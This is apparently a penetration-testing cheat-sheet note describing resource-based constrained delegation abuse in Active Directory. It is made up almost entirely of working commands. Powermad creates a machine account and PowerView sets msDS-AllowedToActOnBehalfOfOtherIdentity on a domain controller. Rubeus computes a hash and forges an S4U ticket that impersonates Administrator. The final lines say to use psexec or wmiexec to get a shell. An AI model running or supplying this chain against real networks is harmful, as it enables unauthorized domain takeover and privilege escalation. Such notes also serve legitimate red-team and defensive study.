If we have an account with permission GenericAll, we can create or update info of users like passwords, machines, etc.
#Import Powermad and use it to create a new MACHINE ACCOUNT
Import-Module .\Powermad.ps1
#Or
. .\Powermad.ps1
# Create new machine
New-MachineAccount -MachineAccount lanz -Password $(ConvertTo-SecureString 'buenosdias' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer lanz -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
# Out Target could be: dc.target.com
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'buenosdias'
# Or with Python3
import hashlib
print(hashlib.new('md4', 'buenosdias'.encode('utf-16le')).hexdigest())
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:lanz /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/dc.example.com /domain:example.com /ptt
Take the hash, copy in your machine, decode base64 and use ticketConverter.py to generate the file .ccache, then export the ticket in the environment var KRB5CCNAME=ticket.ccache and use wmiexec, psexec, smbexec, etc. to authenticate, impersonate user and get a Shell.
